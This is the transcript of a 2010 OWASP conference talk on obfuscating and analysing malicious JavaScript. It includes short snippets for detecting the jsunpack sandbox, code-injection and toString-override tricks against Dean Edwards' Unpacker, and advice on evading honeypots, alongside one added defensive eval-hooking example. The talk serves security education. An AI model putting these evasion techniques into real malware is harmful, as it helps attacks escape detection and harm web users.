creating, obfuscating and analyzing malware javascript

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org Creating, obfuscating and analyzing malware JavaScript Krzysztof Kotowicz PHP Developer http://web.eskot.pl Medycyna Praktyczna [email protected] June 2010


DESCRIPTION

Malware attacks on unaware Internet users' browsers are becoming more and more common. New techniques for bypassing the filters used by security vendors emerge. In turn, the filters get better and new analysis tools are developed - the war continues. In the presentation you will learn how crackers try to hamper the work of security engineers, and how reversers overcome those problems. Emphasis is placed on the weaknesses of automated tools - we'll try to avoid detection by jsunpack and Capture-HPC, and we'll also trick Dean Edwards' Unpacker.

TRANSCRIPT

Page 1: Creating, obfuscating and analyzing malware JavaScript

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

The OWASP Foundation

OWASP

http://www.owasp.org

Creating, obfuscating and analyzing malware JavaScript

Krzysztof Kotowicz

PHP Developer

http://web.eskot.pl

Medycyna Praktyczna

[email protected]

June 2010

Page 2: Plan

Theory - Obfuscation and analysis

in general

in JavaScript

Practice - evading automatic code analyzers

jsunpack

JavaScript unpacker

Capture-HPC

Page 3: Theory

Page 4: Obfuscation

Goal - make analysis harder

Page 5: Obfuscation

There is no perfect obfuscation [cs.princeton.edu]

Analysis as debugging

"Debugging is twice as hard as writing a program in the first place. So if you're as clever as you can be when you write it, how will you ever debug it?"
(Brian Kernighan, The Elements of Programming Style)

Page 6: Obfuscation methods

for → while + if

Iteration → recursion

Complex logical tests

Dummy code branches

Quasitautologies [blog.didierstevens.com]

Enigmatic variable names

Page 7: Obfuscation methods in JS

JavaScript is a dynamic and functional language

Code created at runtime – eval

String.fromCharCode, unescape

Regular expressions - String.replace

Packers, e.g. [dean.edwards.name]

[developer.yahoo.com]

[malwareguru.org]

[closure-compiler.appspot.com]

Others - e.g. WhiteSpace Obfuscation [ktcorpsecurity.com]

Page 8: Active defense against analysis

Function.toString / arguments.callee.toString [isc.sans.org]

autoencryption [isc.sans.org]

browser detection

DOM

window, navigator

timings

cookies

mouse position, screen resolution

Malware served only once per IP [research.zscaler.com]

Page 9: Active defense - know thy language

    function is_even(n) {
        var parameter_is_even = (n % 2) == 0 ? true : false;
        return parameter_is_even;
    }
    alert(is_even(16));

Page 10: Result

Page 11: How to analyze malware JavaScript?

Know JavaScript!

Run the code & observe effects in a controlled environment

Overload functions

eval

String.fromCharCode

Deobfuscate parts of code

Be patient and creative
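The "overload functions" step above, as an added example that is not part of the presentation or its demo repository: eval() is replaced by a logging hook, each decoded layer is recorded, and execution only continues while the decoded text still looks like another decoder stage, so the final payload is captured but never run. The two-layer sample is constructed here; the inner payload reuses the slide's placeholder name and is never executed.

```javascript
// Builds the classic String.fromCharCode(...) decoder call for a given string.
function encodeAsFromCharCode(text) {
  const codes = Array.from(text, (ch) => ch.charCodeAt(0));
  return 'String.fromCharCode(' + codes.join(',') + ')';
}

// Constructed two-layer sample in the eval(String.fromCharCode(...)) style from
// slide 7. The innermost payload is the slide's placeholder name; it is never
// executed, only logged (it is not even defined here, so running it would throw).
const FINAL_PAYLOAD = 'redirect_to_malicious_website();';
const LAYER_1 = 'eval(' + encodeAsFromCharCode(FINAL_PAYLOAD) + ');';
const SAMPLE = 'eval(' + encodeAsFromCharCode(LAYER_1) + ');';

// Heuristic: does the decoded text still look like another decoder stage?
const DECODER_PATTERN = /\beval\s*\(|String\.fromCharCode|unescape\s*\(/;

// Runs the script with eval() replaced by a logging hook. Each decoded layer is
// recorded; execution continues only while the layer looks like a decoder, so
// the final stage is captured but never run.
function peelLayers(script, maxDepth = 8) {
  const layers = [];
  const hookedEval = function (code) {
    if (typeof code !== 'string') return code;     // eval(nonString) returns it unchanged
    layers.push(code);
    if (layers.length < maxDepth && DECODER_PATTERN.test(code)) {
      // The next stage runs with the hook shadowing eval (a sloppy-mode function
      // may name a parameter "eval"), so nested eval() calls land here as well.
      return new Function('eval', code)(hookedEval);
    }
    return undefined;                               // last stage: log only
  };
  new Function('eval', script)(hookedEval);
  return layers;
}

// Analyst-facing view of the layers, outermost first.
function report(script) {
  return peelLayers(script).map((code, i) => 'layer ' + (i + 1) + ': ' + code);
}
```

For a real sample the same hook is usually installed for document.write, setTimeout and unescape as well, since those are the other places a decoded layer surfaces.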

Page 12: JavaScript analysis...

Is heuristics rather than an algorithm

Is manual rather than automatic

A human is required

Tools help greatly, but they're not perfect

Page 13: Practice

Page 14: jsunpack

Runs JS inside SpiderMonkey [mozilla.org]

JS fetched from URL, PCAP, JS/HTML file…

SpiderMonkey is modified to include:

DOM emulation

browser objects emulation

onload() event

monitors eval(), setTimeout() and others

scans the code using signatures file

Page 15: jsunpack - weak points

Emulates browser

Code that won't run (dead branches) will be checked with signatures only

Page 16: Evading detection

We need to detect being run in jsunpack

    if (fake_browser) {
        do_no_harm();
    } else {
        redirect_to_malicious_website(); // or obfuscate an exploit
    }

Page 17: How to detect jsunpack?

Many, many ways:

Bad implementation of window.location

window.location.host = path to the file

It adds its own global variables

    fake_browser = window.location.host.match('/');

    fake_browser = (typeof my_location != "undefined");
    // my_navigator, my_activex, my_element,
    // the_activex, app, ...

Page 18: How to detect jsunpack?

It overloads some functions

Objects emulation has missing spots

    fake_browser = (typeof PluginArray.prototype.refresh == "undefined");
    fake_browser = (document.title == 'My Title');

    fake_browser = (window.open.toString().match(/print/));
    fake_browser = (alert.toString().match(/{\s*}/));

Page 19: jsunpack - bonus

jsunpack runs not only JavaScript

Code will be run in jsunpack, but not in browsers

    <script type="text/dummy">
        // good enough for jsunpack
    </script>

Page 20: DEMO 1

github.com/koto/owasp-malicious-javascript/

index.php / js.js - sandbox detection

(modify js.js to test different techniques)

jekyll2.html - Dr Jekyll attack

js.js - HTML hack

(shortest jsunpack disabler)

Note to online viewers:

Demos require checking and running the files locally - see attached docs

Page 21: jsunpack - summary

You can easily detect being run in the jsunpack sandbox

When detected, you just skip doing bad stuff

If malware code is obfuscated, it will not be detected with signatures

You fly under the radar of jsunpack analysis

Page 22: Dean Edwards' Unpacker

A JavaScript Decompressor [dean.edwards.name]

Reverses Dean Edwards' packer

Packer works like this:

    eval(function(p,a,c,k,e,r){/*code*/}(para, meters))

    /* which is the same as */
    var packer = function(p,a,c,k,e,r) {/**/};
    var s = packer(para, meters);
    eval(s);

Page 23: Unpacker - step 1

Replace eval() with string assignment

value holds decompressed code

    // packed code is in input
    var input = "eval(function(p,a,c,k....";
    eval("var value=String" + input.slice(4)); // cut "eval"
    // executed code will be:
    // var value=String(function(p,a,c,k..);

Page 24: Unpacker - step 1

Replace eval() with string assignment

value holds decompressed code

But! we're blindly executing cut&pasted code!

    // packed code is in input
    var input = "eval(function(p,a,c,k....";
    eval("var value=String" + input.slice(4)); // cut "eval"
    // executed code will be:
    // var value=String(function(p,a,c,k..);

Page 25: Unpacker - step 2

Use Function.toString() to display the code

Unpacked code WILL NOT RUN, it will just print!

Disclaimer - the real code is a bit different, but the concept is the same

    eval("var unpacked = function() {" + value + "}");
    alert(unpacked.toString());

Page 26: Dean Edwards Unpacker - weak points

Concatenating strings and executing the resulting code (injection, anyone?)

Using a constant - we cut first 4 characters without looking at them

eval() without any validation

Depends on Function.toString() to print the code

Page 27: Dean Edwards Unpacker - disarming

eval() uses a single parameter

String() uses a single parameter

...but you could give more :)

Arbitrary code execution without changing p,a,c,k,e,r function!

    eval("code");
    eval("code", "ignored");
    eval("code", malicious());
    String("code", malicious());

Page 28: Dean Edwards Unpacker - disarming

malicious() will execute in packed code

and in unpacker

    eval(function(p,a,c,k,e,r){...}(para,meters), malicious());

    var value=String(function(p,a,c,k,e,r){...}(para,meters), malicious());

Page 29: Dean Edwards Unpacker - disarming

What can we do in malicious()?

Unpacker uses Function.toString()

Let's override it!

malicious() is e.g. obfuscated:

    Function.prototype.toString = function() {
        return 'harmless code';
    };

Page 31: Dean Edwards Unpacker - proof of concept

Page 32: High interaction client honeypots

Capture-HPC [projects.honeynet.org] as an example

Code is run in a real browser inside a virtual machine

Server serves a list of URLs to visit

Client starts browsers and waits…

Code side-effects are monitored

Filesystem

Registry

Processes

If anything suspicious happens to the system, the URL is reported to the server as malware

Page 33: High interaction client honeypots

Runtime environment is the same

There is no emulation

Can we detect that we are being traced?

Page 34: Weak point

Page 35: High interaction client honeypots - robot

Doesn't move mouse

Doesn't click

Doesn't drag

Doesn't navigate

Is "stupid"

Page 36: High interaction client honeypots - user

Moves mouse

Clicks

Drags

Navigates

Is stupid

Page 37: Honeypots – social engineering

Page 38: Honeypots – social engineering

Page 39: Honeypots - summary

No emulation layer to detect

Code is run in real browser

Weakest point is the lack of human element

Just run the code after detecting an interaction with the page

Page 40: Summary

Obfuscation can only make analysis slower

Code can actively defend against analysis

A human is required for a complete analysis

Analysis requires strong skills

Automatic tools can be fooled

detect emulation differences

errors

lack of full interaction with a webpage

Page 41: Links

Demo source: github.com/koto/owasp-malicious-javascript

Tools

jsunpack.blogspot.com

dean.edwards.name/unpacker/

projects.honeynet.org/capture-hpc

malzilla.sourceforge.net

Obfuscation and analysis

isc.sans.org/diary.html

www.malwareguru.org

delicious.com/koto/obfuscation

closure-compiler.appspot.com

JavaScript

www.slideshare.net/ferrantes/just-advanced-javascript

jsninja.com

[email protected] http://blog.kotowicz.net